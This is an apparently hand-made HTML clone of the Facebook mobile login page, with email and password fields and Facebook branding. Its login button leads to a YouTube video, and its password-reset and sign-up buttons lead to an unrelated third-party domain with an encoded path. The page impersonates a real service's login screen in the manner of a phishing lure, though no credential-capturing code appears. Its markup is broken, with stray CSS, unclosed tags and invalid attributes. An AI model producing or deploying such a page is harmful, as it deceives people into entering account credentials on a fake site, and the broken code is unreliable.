<html>
  <head>
    <title>m.facebook.com</title>
    <font face=arial color=gray>
    <p class="paragraph1">Get Facebook for Android and browse faster.</p>
    </font>
     <font face=arial color="blue" align=center>
      <b> <h1>facebook</h1></b><br />
     </font>
    </head>
    <body bgcolor="#fff">
    <div class=form-box>
     <font face=arial color=gray align=center > 
      <formbox{width=393px 720px;
      margin=12% auto;
      padding=0px 0;
   
     }
     </font>
       <style>
       .button1{
         background-color: blue;
         color:white;
         align-self: center;
         width: 70%;
         height:5%;
         border-color: blue;
       }
         .button3{
           background-color: limegreen;
           color: white;
           width: 40%;
           height: 5%;
           border-color: limegreen;
         }
         . button2{
           color: blue;
           background-color: white;
           border-color: white;
           
         }
         .paragraph1{
           background-color: lightgoldenrodyellow;
           height: 5%;
         }
         
         .box1{
           height: 5%;
           border-color: white;
           
         }
         .box2{
           height: 5%;
           border-color: white;
         }
         
         
       </style>
         
       
    <div class=input-box>
      
    <input class="box1" type= email/number placeholder=Mobilenumber/Email size=40px><br /><br />
      <input class="box2" type="password" placeholder="Password" size=40px><br /><br/>
    
     <a href="https://m.youtube.com/watch?v=IRGpArbUe3c"><button class="button1">Login</button></a></br><br />
     
    <u>
     <a href="https://rivervalleyrvatlakeconroe.com/P2dvZHM9MUIzbDVwNVUyNzdaN04="<button class="button2">Forgot password ?</button></a><br /><br />
    <br />
    <p class="paragraph2">-----------------------------------or--------------------------------------</p><br />
    
    <br/><a href="https://rivervalleyrvatlakeconroe.com/P2dvZHM9MUIzbDVwNVUyNzdaN04="<button class="button3">Creat new account</button></a>
      <br />
      <br />
      <br />
      <br />
      
      <p>Copyright infringement 2021</p>
      <br />
      
      Facebook.Inc
 
      
        
      
    
      
 </body>
